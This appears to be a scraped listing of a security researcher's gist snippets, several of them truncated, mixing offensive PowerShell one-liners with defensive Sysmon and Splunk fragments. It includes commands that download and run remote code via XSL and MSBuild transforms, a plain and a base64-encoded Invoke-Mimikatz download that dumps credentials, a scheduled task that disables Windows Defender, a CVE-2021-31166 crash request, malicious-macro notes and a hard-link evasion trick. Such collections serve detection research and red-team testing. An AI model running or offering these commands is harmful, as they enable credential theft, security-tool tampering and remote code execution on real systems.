MHaggis

##############################################################################
### Powershell Xml/Xsl Assembly "Fetch & Execute"
### [https://twitter.com/bohops/status/966172175555284992]

$s=New-Object System.Xml.Xsl.XsltSettings;$r=New-Object System.Xml.XmlUrlResolver;$s.EnableScript=1;$x=New-Object System.Xml.Xsl.XslCompiledTransform;$x.Load('https://gist.githubusercontent.com/bohops/ee9e2d7bdd606c264a0c6599b0146599/raw/f8245f99992eff00eb5f0d5738dfbf0937daf5e4/xsl-notepad.xsl',$s,$r);$x.Transform('https://gist.githubusercontent.com/bohops/ee9e2d7bdd606c264a0c6599b0146599/raw/f8245f99992eff00eb5f0d5738dfbf0937daf5e4/xsl-notepad.xml','z');del z;

##############################################################################
### Powershell VBScript Assembly SCT "Fetch & Execute"
### [https://twitter.com/bohops/status/965670898379476993]

MHaggis

```
Author: @0x1FFFFF 
Date: 1 September, 2021
Goal: Enumerate the human readable permission listed in Sysmon EID 10s.
Note: This type of logic is too heavy to run inline in a search. Use this to generate results and add to a lookup table.
```

$Your_Sysmon_Logic_Here$ EventCode=10
| stats count by GrantedAccess 

MHaggis

$listener = New-Object System.Net.HttpListener
$listener.Prefixes.Add('http://localhost:8080/') 
$listener.Start()
curl.exe -H 'Accept-Encoding: Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9Ac0Ac1Ac2Ac3Ac4Ac5Ac6Ac7Ac8Ac9Ad0Ad1Ad2Ad3Ad4Ad5Ad6Ad7Ad8Ad9Ae0Ae1Ae2Ae3Ae4Ae5Ae6Ae7Ae8Ae9Af0Af1Af2Af3Af4Af5Af6Af7Af8Af9Ag0Ag1Ag2Ag3Ag4Ag5Ag, ,' http://localhost:8080/

xref: https://github.com/0vercl0k/CVE-2021-31166/blob/main/cve-2021-31166.py

MHaggis

<Sysmon schemaversion="4.50">
    <HashAlgorithms>md5,sha256</HashAlgorithms>
    <EventFiltering>
        <!--Event ID 1: Process creation-->
        <ProcessCreate onmatch="include"></ProcessCreate>
        <!--Event ID 2: A process changed a file creation time-->
        <FileCreateTime onmatch="include"></FileCreateTime>
        <!--Event ID 3: Network connection-->
        <NetworkConnect onmatch="include"></NetworkConnect>
        <!--Event ID 5: Process terminated-->

MHaggis

*NOTE - These pull from public GitHub Repos that are not under my control. Make sure you trust the content (or better yet, make your own fork) prior to using!*

#mimikatz [local]
IEX (New-Object Net.WebClient).DownloadString("https://raw.githubusercontent.com/BC-SECURITY/Empire/master/data/module_source/credentials/Invoke-Mimikatz.ps1"); Invoke-Mimikatz -Command privilege::debug; Invoke-Mimikatz -DumpCreds;

#encoded-mimikatz [local]
powershell -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQAUwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAcwA6AC8ALwByAGEAdwAuAGcAaQB0AGgAdQBiAHUAcwBlAHIAYwBvAG4AdABlAG4AdAAuAGMAbwBtAC8AQgBDAC0AUwBFAEMAVQBSAEkAVABZAC8ARQBtAHAAaQByAGUALwBtAGEAcwB0AGUAcgAvAGQAYQB0AGEALwBtAG8AZAB1AGwAZQBfAHMAbwB1AHIAYwBlAC8AYwByAGUAZABlAG4AdABpAGEAbABzAC8ASQBuAHYAbwBrAGUALQBNAGkAbQBpAGsAYQB0AHoALgBwAHMAMQAiACkAOwAgAEkAbgB2AG8AawBlAC0ATQBpAG0AaQBrAGEAdAB6ACAALQBDAG8AbQBtAGEAbgBkACAAcAByAGkAdgBpAGwAZQBnAGUAOgA6AGQAZQBiAHUAZwA7ACAASQBuAHYAbwBrAGUALQBNAGkAbQ

MHaggis

$cmdline = '/C sc.exe config windefend start= disabled && sc.exe sdset windefend D:(D;;GA;;;WD)(D;;GA;;;OW)'

$a = New-ScheduledTaskAction -Execute "cmd.exe" -Argument $cmdline
Register-ScheduledTask -TaskName 'TestTask' -Action $a

$svc = New-Object -ComObject 'Schedule.Service'
$svc.Connect()

$user = 'NT SERVICE\TrustedInstaller'
$folder = $svc.GetFolder('\')

MHaggis

This is a note for myself describing various Visual Basic macros construction strategies that could be used for remote code execution via malicious Document vector. Nothing new or fancy here, just a list of techniques, tools and scripts collected in one place for a quick glimpse of an eye before setting a payload.

All of the below examples had been generated for using as a remote address: 192.168.56.101.

List:

0. Page substiution macro for luring user to click Enable Content
1. The Unicorn Powershell based payload

MHaggis

<Project xmlns="http://schemas.microsoft.com/developer/msbuild/2003" ToolsVersion="4.0"> 
   <Target Name="Example">
      <ItemGroup>
        <XmlFiles Include="https://gist.githubusercontent.com/caseysmithrc/d6ef2fdffa6c054c6996b0f2fb7dd45d/raw/6ce40c15487d67df6771ff205de5ea8a8c6f29c0/customers.xml" />
      </ItemGroup>
      <PropertyGroup>
        <XslFile>https://gist.githubusercontent.com/caseysmithrc/d6ef2fdffa6c054c6996b0f2fb7dd45d/raw/48abcd2a9575e1e5db25596cbaa02f6066bbe9e2/script.xsl</XslFile>
      </PropertyGroup>
      <XslTransformation
         OutputPaths="output.%(XmlFiles.FileName).html"

MHaggis

Param([parameter(Mandatory=$true,
   HelpMessage="Directory to search for .NET Assemblies in.")]
   $Directory,
   [parameter(Mandatory=$false,
   HelpMessage="Whether or not to search recursively.")]
   [switch]$Recurse = $false,
   [parameter(Mandatory=$false,
   HelpMessage="Whether or not to include DLLs in the search.")]
   [switch]$DLLs = $false,
   [parameter(Mandatory=$false,

MHaggis

Using Hard Links to point back to attacker controlled location.

mklink /h C:\Windows\System32\Tasks\tasks.dll C:\Tools\Tasks.dll
Hardlink created for C:\Windows\System32\Tasks\tasks.dll <<===>> C:\Tools\Tasks.dll

This can redirect the search to an arbitrary location and evade tools that are looking for filemods in a particular location.

xref: https://googleprojectzero.blogspot.com/2015/12/between-rock-and-hard-link.html